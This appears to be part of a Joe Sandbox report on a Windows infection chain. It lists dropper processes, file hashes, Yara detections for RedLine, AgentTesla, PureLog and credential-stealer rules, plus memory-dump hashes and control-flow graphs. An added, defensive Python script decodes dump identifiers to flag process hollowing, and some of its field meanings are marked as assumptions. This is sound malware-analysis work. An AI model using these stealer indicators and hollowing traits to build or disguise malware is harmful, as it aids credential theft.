                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\Public\Libraries\Ucvuiswb.PIF"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'646'592 bytes
                                                                                                                          MD5 hash:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 58%, ReversingLabs
                                                                                                                          • Detection: 38%, Virustotal, Browse
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:25
                                                                                                                          Start time:08:24:44
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:68'096 bytes
                                                                                                                          MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:26
                                                                                                                          Start time:08:24:52
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\Ucvuiswb.PIF
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\Public\Libraries\Ucvuiswb.PIF"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'646'592 bytes
                                                                                                                          MD5 hash:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:true

                                                                                                                          Target ID:27
                                                                                                                          Start time:08:24:52
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:68'096 bytes
                                                                                                                          MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false
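The process entries above tie every Yara match to a dotted memory-dump identifier. Two of its fields are readable straight from the report: the first is the Target ID in hex (00000019 is Target 25, bwsiuvcU.pif; 0000001B is Target 27), and the fifth is the Windows page protection of the dumped region (00000040 is PAGE_EXECUTE_READWRITE). Decoding those two fields is enough to see that the RedLine rules fire inside a writable-and-executable region at the image base 0x400000 of the .pif child, which is the footprint behind the "Sample uses process hollowing technique" signature, while the DBatLoader hit in the Delphi parent sits in an ordinary execute-read region and the AgentTesla and PureLog hits sit in read-write .NET heap. The Python script below is an added example, not Joe Sandbox code: it parses match lines copied from this report, decodes the identifier, and flags hollowing candidates. The meaning of the second field (dump phase) and of the seventh field (MEM_PRIVATE versus MEM_MAPPED) are assumptions, as is the reversed-filename check for the two dropper names Ucvuiswb.PIF and bwsiuvcU.pif.

```python
"""Triage helper for Joe Sandbox Yara match lines (added example, not Joe Sandbox code).

Decodes the dotted memory-dump identifier attached to each match, e.g.
00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp
and flags the combination that indicates process hollowing: a stealer rule firing
on a PAGE_EXECUTE_READWRITE region located at the process image base.
"""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass

# Standard Windows page-protection constants from winnt.h (fifth field of the identifier).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h memory-type constants; reading the seventh field as one of these is an assumption.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

YARA_LINE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>[^,]+),\s*Source:\s*(?P<src>\S+\.sdmp)"
)

# Constructed sample: six match lines copied from Targets 24, 25 and 27 of this report.
SAMPLE_REPORT_LINES = """\
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
"""


@dataclass(frozen=True)
class DumpSource:
    target_id: int   # field 1, hex: the report's Target ID (0x19 == Target 25)
    phase: int       # field 2, assumed: 1 = at start, 2 = at exit, 3 = during execution
    base: int        # field 4: base address of the dumped region
    protection: int  # field 5: PAGE_* protection of the region
    mem_type: int    # field 7, assumed: MEM_* type of the region

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:x}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")


def parse_source(src: str) -> DumpSource:
    """Split one dotted .sdmp identifier into its decoded fields."""
    if src.endswith(".sdmp"):
        src = src[:-5]
    fields = src.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump source format: {src}")
    # fields[2] is a sequence/timestamp value and fields[5], fields[7] are not decoded here.
    return DumpSource(
        target_id=int(fields[0], 16), phase=int(fields[1], 16),
        base=int(fields[3], 16), protection=int(fields[4], 16), mem_type=int(fields[6], 16),
    )


def parse_yara_lines(text: str) -> list[tuple[str, DumpSource]]:
    """Return (rule name, decoded source) for every Yara match line in the text."""
    hits = []
    for line in text.splitlines():
        m = YARA_LINE.search(line)
        if m:
            hits.append((m["rule"].strip(), parse_source(m["src"])))
    return hits


def hollowing_candidates(hits, image_base: int = 0x400000) -> dict[int, set[str]]:
    """Targets where a rule fires on a PAGE_EXECUTE_READWRITE region at the image base."""
    out: dict[int, set[str]] = defaultdict(set)
    for rule, d in hits:
        if d.base == image_base and d.protection == 0x40:
            out[d.target_id].add(rule)
    return dict(out)


def summarize(hits) -> dict[int, list[str]]:
    """Human-readable view of every match, grouped by Target ID."""
    by_target: dict[int, list[str]] = defaultdict(list)
    for rule, d in hits:
        by_target[d.target_id].append(
            f"{rule} @ 0x{d.base:x} {d.protection_name} {d.mem_type_name} (phase {d.phase})"
        )
    return dict(by_target)


def is_reversed_pair(name_a: str, name_b: str) -> bool:
    """True when the two file stems are mirror images (Ucvuiswb.PIF vs bwsiuvcU.pif)."""
    stem = lambda n: n.rsplit(".", 1)[0].lower()
    return stem(name_a) == stem(name_b)[::-1]


if __name__ == "__main__":
    all_hits = parse_yara_lines(SAMPLE_REPORT_LINES)
    for target, lines in sorted(summarize(all_hits).items()):
        print(f"Target {target}:")
        for entry in lines:
            print("   ", entry)
    print("hollowing candidates:", hollowing_candidates(all_hits))
    print("reversed dropper names:", is_reversed_pair("Ucvuiswb.PIF", "bwsiuvcU.pif"))
```

Run against the sample it flags Targets 25 and 27 (both bwsiuvcU.pif, RedLine at 0x400000 in a RWX region) and leaves Target 24 (Ucvuiswb.PIF, DBatLoader in an execute-read region at 0x28a1000) unflagged; the same parser can be pointed at the full match table of a report to pull out every process whose image base has been overwritten with foreign code.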

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000003.1852666137.000001A2C9890000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A2C9890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_3_1a2c9890000_mshta.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction ID: 6dc7fd48f8446e16a7e5d89954fb4c117199bebb7c4251f65feee9c5b4017f3c
                                                                                                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction Fuzzy Hash: AE90021669640A99D41415950C4929C5040638A260FD545808416D1588D55E03969153
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1842530535.00007FFAAB970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB970000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab970000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                            • Instruction ID: d7434119911d04e4a5d63ac17dbcb90a0276d598b915e76db3fee3f6dc63f9da
                                                                                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                            • Instruction Fuzzy Hash: 1801677111CB0C8FD748EF0CE451AA5B7E0FB95364F50056DE58AC3665D736E882CB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1842530535.00007FFAAB970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB970000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab970000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8e702702e75f2618a7229afc80279f3a01cb86a5e902ecab81c9189c016ce96
                                                                                                                            • Instruction ID: 3ef24b2f02e88eea17b49cec496d10bfb5264e98f42d42dd33281edb7588c803
                                                                                                                            • Opcode Fuzzy Hash: d8e702702e75f2618a7229afc80279f3a01cb86a5e902ecab81c9189c016ce96
                                                                                                                            • Instruction Fuzzy Hash: 8DC1F69790FAD7DBE31357685C6A4E97F90EF5329470981F7D4C84F0A3EE18288A82D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:3
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph (nodes: id @ start address [API called]; edges: src->dst)
                                                                                                                              14071 @ 7ffaab95c809
                                                                                                                              14072 @ 7ffaab95c80f  CreateFileW
                                                                                                                              14074 @ 7ffaab95c8de
                                                                                                                              edges: 14071->14072, 14072->14074
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: acd416ace24d9dfbcbb39d8b55867f254fa05b93f3d578d471675dd7cb902d4d
                                                                                                                            • Instruction ID: 75b816a46a49c29a0014a4b0acb36581efd717699a4a25161ee887d250f359ce
                                                                                                                            • Opcode Fuzzy Hash: acd416ace24d9dfbcbb39d8b55867f254fa05b93f3d578d471675dd7cb902d4d
                                                                                                                            • Instruction Fuzzy Hash: D4121672A1EBCA4FE7A6976848656757FE1EF47250B1840FFD08DC70B3E9289809C391
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph (basic blocks: id start-end; edges: src->dst)
                                                                                                                              567 7ffaaba226c1-7ffaaba22734
                                                                                                                              570 7ffaaba2273a-7ffaaba2274f
                                                                                                                              571 7ffaaba22821-7ffaaba2282b
                                                                                                                              573 7ffaaba2282d-7ffaaba22837
                                                                                                                              574 7ffaaba22838-7ffaaba2287a
                                                                                                                              575 7ffaaba22755-7ffaaba22762
                                                                                                                              579 7ffaaba22764-7ffaaba22775
                                                                                                                              580 7ffaaba22776-7ffaaba227fe
                                                                                                                              594 7ffaaba22806-7ffaaba2281e
                                                                                                                              edges: 567->570, 567->571, 570->571, 570->575, 571->573, 571->574, 575->579, 575->580, 579->580, 580->594, 594->571
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8hz$8hz$8hz$8hz
                                                                                                                            • API String ID: 0-2997940489
                                                                                                                            • Opcode ID: 59c1dc39494a68be092f2d3aa02ce2ce28b5de97b9c9a3a2645848f6dc3bb547
                                                                                                                            • Instruction ID: a63b4e371f7ef3bf1efb0c7b54425acb06ed7c9c81c09e1aa7f0f2c8df443fc7
                                                                                                                            • Opcode Fuzzy Hash: 59c1dc39494a68be092f2d3aa02ce2ce28b5de97b9c9a3a2645848f6dc3bb547
                                                                                                                            • Instruction Fuzzy Hash: D451F562A1FBC64FE3A6876858651647FE1DF57290B1981FBD08EC71B3E8099C09C3D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph (basic blocks: id start-end [call/API]; edges: src->dst)
                                                                                                                              596 7ffaab95c6f9-7ffaab95c750  call 7ffaab9545d0
                                                                                                                              600 7ffaab95c781-7ffaab95c7ad
                                                                                                                              601 7ffaab95c752-7ffaab95c75b
                                                                                                                              607 7ffaab95c7b2-7ffaab95c7b5
                                                                                                                              608 7ffaab95c7b7
                                                                                                                              609 7ffaab95c812-7ffaab95c873
                                                                                                                              610 7ffaab95c7b9-7ffaab95c7c1
                                                                                                                              611 7ffaab95c7c2-7ffaab95c7d5
                                                                                                                              615 7ffaab95c7d7-7ffaab95c80f
                                                                                                                              618 7ffaab95c87d-7ffaab95c8dc  CreateFileW
                                                                                                                              619 7ffaab95c875-7ffaab95c87a
                                                                                                                              620 7ffaab95c8de
                                                                                                                              621 7ffaab95c8e4-7ffaab95c90c
                                                                                                                              edges: 596->600, 596->601, 600->607, 601->600, 607->608, 607->609, 608->610, 608->611, 609->618, 609->619, 610->611, 611->607, 611->615, 615->609, 618->620, 618->621, 619->618, 620->621
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1648332400.00007FFAAB950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaab950000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p[z
                                                                                                                            • API String ID: 0-2258540297
                                                                                                                            • Opcode ID: dbfc7a78e8e6728957da550923d0b1b8d1493cc15acc39d406e7d652d2515623
                                                                                                                            • Instruction ID: 703057e5b7440af174495da7e8f1fe61370270671b2f7007128371025ffed046
                                                                                                                            • Opcode Fuzzy Hash: dbfc7a78e8e6728957da550923d0b1b8d1493cc15acc39d406e7d652d2515623
                                                                                                                            • Instruction Fuzzy Hash: CE61F67190DA488FD758DB6C985A6B97BE0FF59350F04427FE04DD32A2DF24A80687C1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph (basic blocks: id start-end; edges: src->dst)
                                                                                                                              695 7ffaaba2b044-7ffaaba2b058
                                                                                                                              696 7ffaaba2b05a-7ffaaba2b064
                                                                                                                              697 7ffaaba2b068
                                                                                                                              698 7ffaaba2b084-7ffaaba2b090
                                                                                                                              699 7ffaaba2b066
                                                                                                                              700 7ffaaba2b06d-7ffaaba2b07a
                                                                                                                              702 7ffaaba2b0de-7ffaaba2b135
                                                                                                                              703 7ffaaba2b092-7ffaaba2b0a2
                                                                                                                              705 7ffaaba2b0a4-7ffaaba2b0ae
                                                                                                                              707 7ffaaba2b07c-7ffaaba2b082
                                                                                                                              708 7ffaaba2b0b0-7ffaaba2b0c5
                                                                                                                              709 7ffaaba2b0c7-7ffaaba2b0dd
                                                                                                                              717 7ffaaba2b155-7ffaaba2b156
                                                                                                                              718 7ffaaba2b137-7ffaaba2b153
                                                                                                                              720 7ffaaba2b15e-7ffaaba2b16a
                                                                                                                              722 7ffaaba2b16c-7ffaaba2b170
                                                                                                                              723 7ffaaba2b172-7ffaaba2b177
                                                                                                                              724 7ffaaba2b178-7ffaaba2b182
                                                                                                                              edges: 695->696, 695->697, 696->698, 696->699, 697->700, 698->702, 698->703, 699->700, 700->698, 700->707, 702->717, 702->718, 703->697, 703->705, 705->708, 705->709, 707->698, 708->709, 709->702, 717->720, 718->717, 720->722, 720->723, 722->724, 723->724
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r6x$r6x
                                                                                                                            • API String ID: 0-3369949480
                                                                                                                            • Opcode ID: e15398dfe8d22649859a6c19dae53448eb1a412cda9f960a9cee37d72eccc3ee
                                                                                                                            • Instruction ID: 7321d066292f4de843fea0b78f8df645752b9974fa40f6637d5ac45c9663b82a
                                                                                                                            • Opcode Fuzzy Hash: e15398dfe8d22649859a6c19dae53448eb1a412cda9f960a9cee37d72eccc3ee
                                                                                                                            • Instruction Fuzzy Hash: 2E412732A1DA49CFE799DB1CC494AB877D1EF59340B5442BED04DC71B2DE26AC058780
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph (basic blocks: id start-end [API]; edges: src->dst)
                                                                                                                              935 7ffaab95c809-7ffaab95c873
                                                                                                                              940 7ffaab95c87d-7ffaab95c8dc  CreateFileW
                                                                                                                              941 7ffaab95c875-7ffaab95c87a
                                                                                                                              942 7ffaab95c8de
                                                                                                                              943 7ffaab95c8e4-7ffaab95c90c
                                                                                                                              edges: 935->940, 935->941, 940->942, 940->943, 941->940, 942->943
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1648332400.00007FFAAB950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaab950000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 9dbff6ecca2aa315b112fdbdfcd89f8d2e112a63b22cf3470d32861c6226d9d0
                                                                                                                            • Instruction ID: 5bce7bb13e29c6a0c8ec13b428b7cda9a5f705ed3fb234a722f19317080af25b
                                                                                                                            • Opcode Fuzzy Hash: 9dbff6ecca2aa315b112fdbdfcd89f8d2e112a63b22cf3470d32861c6226d9d0
                                                                                                                            • Instruction Fuzzy Hash: 0F319F7191CA5C9FDB58EF5CD845AE9BBE0FB69321F04422EE04EE3251CB71A8058BC1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 232f3a57b737b8863ce638220fbf1804ef5282bfb37cf8667eed779ecc852e3c
                                                                                                                            • Instruction ID: e41de46f15e7ba4a3ee00e1ac664bab8db38bcac9be637a11754b0ddc684a5e6
                                                                                                                            • Opcode Fuzzy Hash: 232f3a57b737b8863ce638220fbf1804ef5282bfb37cf8667eed779ecc852e3c
                                                                                                                            • Instruction Fuzzy Hash: 82122471A1EBC58FE366972858651B57FE1EF57250B0982FFD08DC70B3E918980A83D2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
